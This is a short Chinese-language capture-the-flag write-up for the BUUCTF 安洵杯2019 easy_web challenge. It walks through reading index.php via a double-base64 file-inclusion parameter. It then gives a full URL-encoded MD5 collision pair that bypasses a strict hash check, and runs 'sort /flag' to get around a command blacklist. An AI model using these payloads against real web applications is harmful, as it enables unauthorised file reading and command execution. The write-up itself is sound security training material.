buuctf 安洵杯2019 easy_web

打开网站

看到一个图片覆盖的页面，看了看源码除了一个md5 is funny啥也没有御剑扫描了目录也没扫出啥，但是默认的url里面image这个参数里得值挺怪得于是复制下来解码,这里就要说一下不知道为啥CTFtool这个网站得base64无法解这个码本地burp就可以解出来

是个图片名，而html源码里面也是这个图片得源码，猜测这里是否存在文件包含，于是对index.php进行hex ascii转码后两次base64编码，传入url后获取index.php源码

源码中可以看到得是我们需要POST传入一个参数a和一个参数b并且着两个参数都被转话成了字符型，参数值要不相等，但是md5值要相等才能执行shell命令，于是传入参数a[]=a&b[]=b无法绕过，这里对于参数进行了强转，无法使用数组绕过，而饶过所用a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2进行绕过，而对于cmd参数也有过滤，过滤了cat,more,less,tac,head没有过滤sort所以我们可以使用sort%20/flag来取得flag